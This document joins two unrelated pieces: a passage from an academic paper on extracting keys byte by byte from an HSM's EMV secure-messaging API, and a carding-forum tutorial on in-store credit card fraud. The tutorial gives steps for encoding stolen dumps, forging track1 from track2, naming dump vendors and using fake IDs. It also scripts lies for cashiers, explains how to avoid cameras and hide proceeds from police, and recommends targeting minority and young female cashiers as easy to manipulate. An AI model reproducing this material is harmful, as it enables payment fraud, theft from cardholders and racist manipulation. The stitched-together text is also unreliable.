Such message injection can compromise the operation of particular cards actively, for instance by constructing a message containing a known PIN for the card. However active attacks at a bank data centre carry a significant risk of revealing the attacker's location, so retrieval of communications keys or PINs without affecting card state is far more dangerous. We now show how to expand the above oracle into a partial-key dictionary attack mechanism: using this approach, we can rapidly extract the key from any encrypted data field in a secure message, one byte at a time. In our explanation, we use [ ... ] to denote hex notation of a single 8 byte block. Here is the algorithm: ExtractKey { K1 }KM /T :

1. prepare 256 plaintext blocks of the form [0000 0000 0000 00yy] where 00 yy ff. 2. use EncryptionOracle on all of 256 plaintext blocks to generate a dictionary of 256 ciphertexts indexed by the ciphertext: {y y , 00 y y ff : (c, y y )}. 3. given any secure messaging key {K2 }KM /SMSG , make an API call as follows: [0000 0000 0000 0000], offset = 7, {K1 }KM /T , {K2 }KM /SMSG - c

4. compare c against the dictionary of ciphertext-indexed bytes. The match yields the first byte of the key, call it aa. 5. in order to discover the next byte of the key, repeat the process with a dictionary built from 256 plaintext blocks of the form 0x000000000000aayy, with an offset of 6. This will yield the 2nd byte bb of K1 . By continually shifting the key over by one block, we can extract the entire key, one byte at a time.

00000000 00000001

e(00) e(01)

. . .
000000fe 000000ff

Encryption Oracle
e(fe) e(ff)

. . .

00000000 e(k1)

K offset
Fig. 2. In the key-shifting attack, A 256-element dictionary is built up for each byte of the key that we want to check.

For a k -byte key, it takes 257k queries to extract the whole key: 256 to build up each dictionary, and one more query to identify the specific key byte. Thus a DES key can be extracted in 2056 queries, while a two-key 3DES key can be extracted in 5112 queries. With such an attack, a key update message between bank and card could be eavesdropped, and then a cloned chip card produced, or PINs could be discovered at will. It is interesting to see that while there is nothing wrong with the concept of a secure message in the EMV standard, the flexibility and extensibility requirements of the protocol have made it difficult to implement in an API. It seems IBM chose to make a general-purpose API command, which supported arbitrary secure messages, but unfortunately was also open to abuse.

That's my official paper. I just thought that in some kind of population like You it should be interesting. I just can offer some informations on pm or email.

carder forums

Everything you wanted to know about instore carding


Introduction:

So youre interested in trying out instore carding? Instore carding is one of the fastest ways to get money. But you will need to keep your head on
straight for this. As you should with every operation you go out to do. This tutorial will tell you the ins and outs of instore carding. Feel free to
distrobute this as much as you want.

For the beginners:

Youre obviously reading this because you either A. Want to learn how to instore card or B. Want to see if you can find anything you are not aware of.
For people who chose A. You should have atleast some prior knowledge of credit cards before you try instoring. If you do not that is ok too, just keep
reading the tutorial and by the end of it you should be fine. The most important thing about instore carding is how you *Take the part* of the identity
youre *Playinig* as. If youre going into a store looking to come out with $3-5k worth of electronics dressed in your normal apparel and being nervous,
think again. You need to dress up and act like a person who would look like they could buy these items any day of the week. The first time youre going
to be nervous ofcourse, its natural to be nervous the first few times. But with time and past experiences to look back on, it just gets easier as you go
on.

Dressing the part:

This should come natural to most people out there. To buy something expensive you need to make it look like you can buy these items along with acting
like you can (below). For your first operation i suggest should include you going into any of the clothing stores listed below and buy a decent amount
of quality clothes. I cannot stress enough how quality plays a part in dressing up. Buying a sweater in walmart and a sweater in banana republic could
determine the difference between getting out with your goods or running out of the store. Along with clothing you might want to buy some jewelry or a very
high priced watch. If a cashier suspects something is up, seeing some classy jewelry or a watch could also help reduce the suspicion.

Clothing stores are usually never uptight with purchases of clothing so that is why I suggest going there first to get some quality clothes. You can be
dressed as you want in there and it wont matter. When you buy the new clothes, put them on in a restroom and then continue your activities on a higher
priced basis.

Acting the part:

This area will come hard for some but easier for others. Prepare yourself before you go in with things you might say. If youre going into a store to
buy smaller items ($800 and below) , this usually not hard to accomplish. But for larger items you should act as if you can afford these items at any
time of day. Acting stuck up in a sense can accomplish this. Other than that, dressing the part is the other area that helps you present yourself as a
person of wealth.

Beginning:

Before you go out there and start instoring you will need the following items.

Card reader/writer - Youre going to have to (in most cases) need a card reader/writer to write new dumps on your cards. Especially if you want to re encode
your cards and go out. The only case where you would not need this is if you were buying plastic from a vendor who offers to encode the dumps for you. For
a reader/writer I highly recommend the MSR-206. It is the most popular encoder out there. You can buy them from
Price: $200 $640

Computer/Laptop (Preferred) - To be able to encode your dumps (later on) you will first need a computer to hook your card encoder up to. Using a desktop
is fine but if you come into any problems with your dumps which is going to happen, you will have no way to re encode your plastic. You will have to drive
home and re encode there. But if you have a laptop, you can bring your MSR with you and just hook it up and re encode while youre in your car. Doing this
will save you gas, and time. Price: $600 to $2400

Power Inverter - This is a very handy tool that youre going to need for this and you will probably find yourself using for all other types of things. The
MSR requires a power source so buy or card one of these. If your laptop battery gets low aswell which will sometimes happen just hook it up aswell. I
found a very good one at BestBuy for $80. It covers up to 800 watts (400 watts each plug). Price: $80

Plastic - I have seen all sorts of ways to obtain plastic. From stealing others and using those to buying them from a vendor. You DO NOT want to steal
anyones credit cards and start using those. And you do not want to re encode your own credit cards. Im sure it makes sense to do so but over time if you
start using your own credit card, the credit card companys are going to see the name being used and will surely contact you about these occurances. The
best bet is to buy plastic from a vendor. Think about this too. When buying plastic, get atleast 2 cards with the same name as your novelty. It will save
money on new novelties and give you a higher chance of walking out with your merchandise.

Dumps - The most important item of this whole operation. What would you do without dumps? Nothing thats what. I highly recommend SaintVolcan for
dumps. He supply the best quality on dumps. I have tried over 7 different dump vendors and I still stay strong with him. Now depending on what youre
planning on getting out for your first op will determine on how much you will need to spend on dumps. I would not worry about spending for now. As soon
as your op is over you will see that you have well made your money back from this.

Wallet - Some people may think that putting the plastic and novelty in your own wallet is not a bad idea. But the truth is that it is probably one of the
biggest problems that could arise if anything was to happen. Keeping your false information and your real information seperate is a necessity. If you have
any sort of personal contact information on you when carding I would suggest dropping it off in your car.

Optional Items -

Fake ID - HIGHLY RECOMMENDED but is not always needed. Most of the time for large purchases cashiers will ask for an identification that matches the
plastic. There are numerous vendors out there who provide a novelty service that will fit your needs. Getting a state that is semi close to you is ideal
in this situation.

Anonymous Phone - This is optional to have, I have used Rydens dumps the most and he checks the dumps before sending so that all are valid. His dumps
work 8/10 times on average. So if one card does not work I simply hand them another card with an excuse as to why that card was not working. If youre
going through any other vendor other than BadB and Script or Ryden you should buy a tracfone and find a phone merchant that will verify your dumps before you go
into a store. When using a phone merchant there are two ways of authorizing a card. Some people think that charging a $1 or $1.50 on the card will not
kill the card as many businesses use a $1 or $1.50 charge as a pre-authorization to check and see if the card is valid. Others prefer charging a random
higher amount to make it look like a legit purchase. Either way, its up to you how would want to check it.

Serial to USB Converter - Smaller laptops may not come with a serial port to connect your encoder to. If this is the case you will need to buy one of
these. Price: $15-$25

Newskin Bandaid Liquid - You might be asking yourself "What would I do with this?". Well, if you really want to be protective you can put some newskin
on your finger tips so no traces of fingerprints will appear on the plastic if any misfortune was to happen.

Planning:

Planning out what youre going to buy before you buy it would be a nice thing to do. It saves you time thinking of what you need or might need.

Also think about this. If youre main goal is to get a hefty sum of money, you should checkout ebay to see what sells for a high percentage. Usually gift
cards to popular stores get high amounts back because they are just like cash. But just double check ebay.

If youre going to do an instore op for your own personal pleasure then you really dont need to make a list because you should already know what you want
to get. Or you can look around in the store and choose what you want.

Taking care of business:

Before hand I always like going to the bathroom. It makes the carding situation a bit more easier if you get nervous. You do not want to get caught and be remembered as the kid who shit his pants. That is if you do get caught which odds are you wont if you follow these
instructions.

Destination Safety:

Choosing a location to instore is not very hard. The internet has a vast amount of websites that have store locators. So find your subject mall or store
and do a search to see whats around you. Here is a very important rule to follow by. Do not do anything where you live. Or in a more common way of putting
it. Dont shit where you live. Find a store thats atleast a good half hour drive away from you and is atleast two cities over.

Some people choose to use fake license plates when entering your destination for carding just to add that extra level of security on in case a camera
catches the car that drives away. This is ofcourse optional, but it doesnt hurt to put more safety on. Just dont speed away or anything that could get you
pulled over.

Parking - When parking your car, make sure you park for out so no camera will catch your license plate. It will be worth the extra walk when youre walking
out with your merchandise.

Ready:

So now you have everything you need to get started. Youre prepared for the best and the worst situations to come.

The first time you go out you should expect some nervousness to come even before entering one of the stores listed below. The most important thing to do
is to stay calm and act natural. The more suspicious you act, the more the cashier is going to suspect something is up. I do not recommend taking any drug
or alcohol to calm yourself down. You need to look calm and natural while being alert to your atmosphere at the same time.

anatomy of a dump:

Quote:There is a more detailed version of this on CP. But for now, you will only need to know this information to start.

B41111111111111111111^LASTNAME/FIRSTNAME^060910100 000000000000000000
41111111111111111111=0609101000000000000000000000

B - Identifies to the POS system that your card is a bank card

4111111111111111 - Credit Card Number

Lastname - Lastname of cardholder

/ - Seperater

Firstname - Firstname of cardholder

06 - Experation Year

09 - Experation Month

101 & Beyond - Bank data

Now some vendors will only sell the second track. So that leaves you with trying to figure out how to write track1. Most stores do not check track1 so it
is not the most important thing. But to be safe I always include track1. Here is an example of what you will need to do. It is very easy.

4111111111111111=060910100000000000000

If you havent noticed, track2 in most cases is just like track1. To begin making track1, add a B that will indeicate its a Bank card.

B4111111111111111=060910100000000000000

Then, youre going to want to change the = to a
^lastname/firstname^ .

B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000

And finally, youre going to add six zeros at the end of the dump.

B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000000000

And thats your dump. Like I said its not hard to create track1 from only having track2.

Software to encode the dumps - I recommend TheJerms software. It is very self explanitory.[/color]

Types of dumps:

People ask me all the time about using generated dumps and if theyre good. I would not use generated dumps. Most of the time they will only work correctly
with a certain Bin. And there is a 15% less success rate than using other types of dumps. You might as well use quality dumps in your locations you choose
so people will not remember you instead of having errors come up and your face gets noticed more easily.

The best quality dump you will probably find are skimmed dumps. Skimmed dumps mean that the actual card was swiped onto a portable Mag Stripe reader.
Therefore, using these you know you will have all of the correct information for track1 and track2.

Hacked dumps are usually taken from databases by you guessed it, hackers. The quality on these are the normal quality thats out there.

Dump types and limits:

I will only discuss so far visa, discover dump limits and a word on amex dumps as I have not encounted any use with mastercard dumps.

Visa Classic - These types of dumps are usually the cheapest to buy from a vendor. I have heard that on average you can get $500 on these types of dumps.
But I have been pulled atleast $800 on them. Visa classics have a balance limit of $500 to $3,500. Although the most I have been able to get off of a
single classic is $2,600 before an error occurs.

Visa Gold - One step above the classic, These limits start at $3,500 and can double as the cardholder gains good credit. With these you can make higher
amounts of purchases.

Visa Platinum - Visa platinum dumps are for the larger purchases mainly. On a good day you can pull off anywhere from $3,000 to $6,000 .

Visa Signature & Business - Signatues are said to have no limits. So for us that means these have the highest limits available. People have said to have
gotten anywhere from $5,000 to $20,000 off of these types of dumps.

Discover - I have not used these that much in my past but from what I gathered you can get anywhere from $1,000 to $5,000 on these in one purchase. Using
these dumps for multiple purchases will most likely kill the dump before you get past either of those limits. Almost all discover cards begin with a
balance of $10,000.

Amex - I have not used these dumps. The reason to that is that you need the correct CVN to complete the transaction. It is not embossed, but printed onto
the plastic. So you cannot re encode amex dumps. If the CVN is not correct when entered, you will automatically get a call for authorization.

How long dumps last:

This question no one can answer. You might be able to make a good prediction of how long they will last if you think of time and the dump type. For
instance. If you have a classic dump, its 11:30 AM and you make a variety of small (Under $20) purchases. Odds are youre going to get that card to last a
lot longer than a classic dump thats doing $300 purchases at 7:30 PM. Think of the cardholders work hours. They will usually be 9 AM to 5 PM. That is when
their card is idle so to speak.


Choosing your cashier:
This is probably one of the more fun things to do while instoring. Usually 90% of the time, Minorities and Younger Girls make the best choice for cashing
out. Minorities include, Blacks, Mexicans, and Asians if you were wonderings. The reason you want to choose these types for your cashiers are because they
are usually the easiest to manipulate. In some cases you are going to have to use a normal person to cashout. But try not to make it a habbit.

Interactions with the cashier:

In order to safely get your items out of the store successfully, you will need to know how to interact with the cashier. To in a sense manipulate them.

When you bring your stuff up to the cashier act normal. If it is a large amount they might say something nice to you mentioning the amount of merchandise
you are buying. Just play with it and make them feel good aswell. If you make the cashier not feel comfortable they will think something is up if any error
happens. Which will sometimes if you are planning on doing a lot of instore.

Errors and Excuses:

As I was saying above, there are going to be errors now and then. Now most are very easy to talk your way out of. But in some cases youre going to need
to know when you try and grab your novelty and card and just run. That will most likely not happen if youre only doing this a few times but for people
who are planning to do this more often it is most likely going to happen atleast once. I have listed below a few common errors and how to handle them.

Optional Pre-Excuse - LWAI brought this excuse method to a lot of peoples attention and it is a very good idea in most cases. Making the cashier
already think that the transaction will not go through so they are not surprised by the error, which makes handling the situation much easier. Saying
something as easy as *I hope I have enough to cover this* or anything around those terms is good.

Declined - Once you spend and spend on a good dump there has to be an ending point. Usually with dumps that will not die this is the final step to
completing it. Hopefully you will have another card on you to hand the cashier. If you don't thats fine too.

If you have another card - Oh, I thought that was going to happen. Here try my other card.
If you do not have another card - I will be right back. I'm going to go get my check book / go to the ATM.

Call For Authorization - This one can be tricky if you do not have the right cashier. This is something you DO NOT want the cashier to do. A call for
authorization is basically the store calling the bank or the stores authorization center in order to confirm that it is the actual cardholder making the
purchase. If this happens just stay calm.

If you have another card - I don't have that much time, Ill call the bank later. Try my other card.
If you do not have another card - I don't have that much time for this Ill call my bank and come back tomorrow.

If they persist on making the call, put your hand out as if they were going to give you your plastic back. Doing this tends to put some stress on the
cashier as to whether or not give the card back to you. They usually will put the card back in your hands.

Do Not Honor - This will happen every now and then and is probably the easiest to overcome. The cashiers will sometimes just ask you if you have another
card.

If you have another card - Hand them the card and say you'll call the bank about that one.
If you do not have another card - Oh, I will call my bank about that tomorrow (then leave)

Those are the most common problems you are going to find. Of course there are more error codes. There are about 50 of them. But by the time you manage
to talk yourself out of these you will have enough experience to talk yourself out of the rest.

Selling your items:

There are a vast amount of ways for you to liquidate your items. The best way to do so is on ebay. I am not going to go into a large description because
then this tutorial would change to how to sell your items or scam on ebay. You can either buy an account from a vendor or get a B&M bank account and
create your own. I do not suggest using your own ebay account. A lot of people have in the past and even if a good amount havent been caught, you do not
want to be that small percent that does.

Storing your money:

Here is another area that can be done in a lot of ways. I will tell you to not put the money in your legit bank account. If you were thinking that,
you should take a minute and think again. You could store your money on an electronic bank account service such as egold, or webmoney. Or if you want
more control over your money, you could keep it all in a well hidden safe. Using an electronic bank account instead has a higher security rate. As if
anything was to happen to you involving LE, odds are they will not find your information for that account. Which means they would not have access to your
funds because they would not know it exists.

End Notes:

Thank you for taking your time to read this tutorial. I hope it was worth your time! I also hope that everyone who is inspired by this reply with any
words or questions they would like to say. Good luck to all of you!